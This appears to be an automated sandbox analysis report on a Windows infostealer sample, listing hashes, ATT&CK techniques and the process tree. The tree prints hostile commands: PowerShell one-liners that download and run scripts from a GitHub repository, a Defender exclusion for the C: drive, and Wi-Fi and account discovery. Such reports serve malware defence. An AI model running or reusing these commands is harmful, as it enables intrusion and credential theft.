Analysis
-
max time kernel
143s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
26/08/2024, 00:50
General
-
Target
2024-08-26_2d7579cc28665be3a9ecbbd9b3a735aa_poet-rat_snatch.exe
-
Size
14.0MB
-
MD5
2d7579cc28665be3a9ecbbd9b3a735aa
-
SHA1
1299955dc62428a0918ba8420a2e1b70d55da72f
-
SHA256
23d7f90771249c1125d386bc0aaef917ee2f1cc35cf51dc33068d21c617856cc
-
SHA512
8e2cd2744b22df82985434d9668add92cab9c40412c91d2b5860f6ad422ed1f2fa79b742eaf901a8a4edae6561fdd91e628a329bf621f2a531d498d5daa1efb7
-
SSDEEP
196608:xsWQx346iodNv5Q8dbWfiwmjmX3o9gvK9aXFFT:x2xcobv5Q8CmjmHzvfz
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Network Service Discovery 1 TTPs 1 IoCs
Attempt to gather information on host's network.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
-
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 1 IoCs
-
Modifies Control Panel 2 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 60 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-08-26_2d7579cc28665be3a9ecbbd9b3a735aa_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-26_2d7579cc28665be3a9ecbbd9b3a735aa_poet-rat_snatch.exe"1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\azkjjou5\azkjjou5.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE27.tmp" "c:\Users\Admin\AppData\Local\Temp\azkjjou5\CSC431B38FC276D4A8E9B73E06EB9BA4F87.TMP"4⤵
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators4⤵
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall show allprofiles3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /all3⤵
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" user3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user4⤵
-
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /displaydns3⤵
- Gathers network information
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup4⤵
-
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" startup get command caption3⤵
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano3⤵
- System Network Connections Discovery
- Gathers network information
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe3⤵
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all3⤵
- Gathers network information
-
-
C:\Windows\system32\ROUTE.EXE"C:\Windows\system32\ROUTE.EXE" print3⤵
-
-
C:\Windows\system32\ARP.EXE"C:\Windows\system32\ARP.EXE" -a3⤵
- Network Service Discovery
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C "Add-MpPreference -ExclusionPath 'C:'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yzsv1vdl\yzsv1vdl.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE26.tmp" "c:\Users\Admin\AppData\Local\Temp\yzsv1vdl\CSCAA33D0FBB5324735ACA96526B3A6F438.TMP"4⤵
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c start facebook.com2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exePowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd /c rundll32.exe user32.dll,SwapMouseButton2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32.exe user32.dll,SwapMouseButton3⤵
-
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps12⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM wallpaper32.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x300 0x4981⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5440cb38dbee06645cc8b74d51f6e5f71
SHA1d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA2568ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA5123aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6
-
Filesize
1KB
MD5a67c6a87e0111e28e44d361b69f6957b
SHA17ab59482f54678be40372ba277cb4db10ead3872
SHA2561430ae5eb545c6c56168f2ebd53180fecc0479ece1897cb09cbfc4909a60b165
SHA512318b185134f718c60a4e9c26e359847437930a4721132e909d13d4236a4cfe56ff8cf87dfbd1a61cd77d5e17c2452a9786042ecf98f3a44f82f1f2034a8b9f77
-
Filesize
944B
MD5be9965796e35a7999ce50af07f73b631
SHA1dde100f3f5a51fa399755fefd49da003d887742a
SHA2566ea6a56f5d5ec6f60b5a748840eed28859f792db2e37f4c1c419e3a92fc619b3
SHA51245369246c8f6e80fa7a3c34db98922702e5f10e67348c94bb27f5bb241ad72cecd72ff5843a2c6b47cec390a6b9c97ba3c4d4244c62b8119ce1b2ca0c3dc3e37
-
Filesize
1KB
MD594f52d6742259f2fe00b845147de68fe
SHA13239274a5736dade4b67e298c641137bcc467f25
SHA256ecf6a96be0430d5646a5a2d5f138d956202e56d1edc96620a0e8d9e9dbb77f05
SHA512de9595b70416cccda6e847aea8daaec089aeac47f66ea93aae864bb21a4316aad32edbe711cc627b629c4537f4fb7dff788ba997f3f90fa514b996578c1d4742
-
Filesize
1KB
MD5ed7d3f1c3456a2fa4c2323f6251fb773
SHA12440673699f9d1f9969cd4011cd3dfcadccd8324
SHA256e7862f6f5c994d517f795a2bae015de7af0e37e3f586341f39891a170163f5c2
SHA512c48bdf4caaae14fdeacbb0e17486fcfb1e9c51fd55d47660c7cd778eea5c477b8f0281a8a199a13a45962c8af39b5dba2c56efde2800dc54afa149c31223c0da
-
Filesize
1KB
MD5974d0bc3db0ec4cfc66c49352d16c438
SHA1fb9a650e2a9cbcd7a0500100cd78c7fb1e81c768
SHA256c3338c6b6b74e31d28a1718d520a048acdeb85da30df26ee17bb39052cc4ca8f
SHA5121b6667ddca90a416e1d0f7334647d56f8e8df18142313f3fccccdade4cff1ed6bddfa4c6e7be10c193dcbed03cd0cee3854335ae3111c06be08c59655446bbce
-
Filesize
88KB
MD5f2e83facdcb2f561c782ff8078168026
SHA1c5be145afc039acb77be644634b30fcc2fa0b394
SHA2564575568c1feb152f523536ee9dd5496e80a8e2f88d3f7790b59543a8a934949d
SHA5126a512457a691be40dbd9b0468dc1fc08e5dd08facf44c7b8293bf3bf17bb8d6a22437955eba4147687730236e89b25ef71287394662ad4a2e0754c6264aeaffe
-
Filesize
24KB
MD5793acfc82e0b6329c3d0aeacf3d73831
SHA1ea2209d38c40211bbb7f14db333371002ca2f26f
SHA256ec78d7d6a0ff68474461dc2426b018180d2a6cba6531cf051a3e386c7c92dc78
SHA512992a162cde1eb3f202a3fb00e00b82fa9352750b90a254c0e0eeab5423d7de0cc859f7565bbcc76253b5a883fc48952a8ae6f12fb2908b26138033a5a3880968
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5706d9a49f8df1d6d48a94283b6d9e2dc
SHA129d2a20886877586480c4369ebce0ee1ae0a2788
SHA2567b3d76bd99eff31bb922582aea5419ac1164ce5c69b2a72d2d6271a6952e46a0
SHA5120e7c0176688e1510d0cbcc4bf507eca80b1daaf0e7d59ebe1357e2466fa2ed2c6f1ed6f67c165b7a9fce892474a29bda5e01b72b4a39b4ff3224ef4254bc651b
-
Filesize
4KB
MD5a3d92e54049efe86075997fb8aeb1f66
SHA1a63a83720f802bce3b41c60ae077c9cf13880378
SHA2560172b395aff0d55e97f7768bb37c8cc4af1eaf25a129af296a1db0a0ce37c22e
SHA512fa922563ec86eb24fd76917a667d5bc86eed946a6454ddcb80b16a7c199432a7bb3c6aa18b422491cb243ceb9a2005e2a47a4ec7e8c87553d714fc1bcc96db10
-
Filesize
2KB
MD59758656bbe8589c66bb241b052490c72
SHA1b73da83fb3ae6b86c6365769a04de9845d5c602c
SHA256e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351
SHA512da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34
-
Filesize
652B
MD514d7fa1afbb0aa50f04a0e602651ca02
SHA1de35d5eea254c102d34aab269735aea6dad09276
SHA25656b9ebdb830b357609ef331dc5f47f2c0cd78f898cbef02dd05a1bba46bb20e0
SHA512dc9e8abb40dd893aac8962d15c57a27dfa4b500c9f5fa2fad8b9777fbf3dd5894acc3e30e7c9707b381ed460336baa457da710c00da9557c3a5118f0d2aa9ce9
-
Filesize
369B
MD50cf6e3a873f50fdd4150804672802dac
SHA1e9f4a2e98e8ccf0ff157386248e03f2646a4913e
SHA256d797344b25145fed5c57503c7390697fc3334bb93e237aeaaef249ec521731e5
SHA5129f8cbe434659696cd4fa64e30e2409bdf86a80db2f2a705a3885553707276f85a82071c7fe3e7eb61e425cd230e4d697637d27b6896dd824cfe0d3879c1ff77c
-
Filesize
652B
MD51a279b00acc48c7b41d8000d5d8bdd04
SHA1379c5a5a37d7168da254dd15bc83a5d024e0c30a
SHA256cf50f64cf8708c8d8aade1389d73e67fe6f14715fb2e1d1e2305d58b4d3abde4
SHA5121770d657da405660dcd6020566eb2fe5e9a775942b6db1d544a9ebc2ed7727823399bc7b69315419c6d5d4557099cfcd7b12563ab7e13f29eaaf7644a3fb4290
-
Filesize
1KB
MD58a1e7edb2117ec5dde9a07016905923b
SHA10155dbeeb16333e2eaa767b0209750efee56f47f
SHA256c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007
SHA5124ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21
-
Filesize
369B
MD500fd699c1b6798f39da46d3ece8aacc4
SHA188c613e0f1768a050b1bf018e11cd3de057229a4
SHA25683db30e515e994a627a46f35f23909b554051206dd4495e632f0f1ddd2d5794d
SHA5123d692aae61bab30baaa201fe6645ec64e6e00db892118e70a082ce554cee23d8e1dc093da2823b2c4e20c3a5906e672c8a4ec05ab022d7fa3a0f37259f880dbe
-
Filesize
7.6MB
-
Filesize
32KB
-
Filesize
40KB
-
Filesize
144KB
-
Filesize
168KB
-
Filesize
72KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
32KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB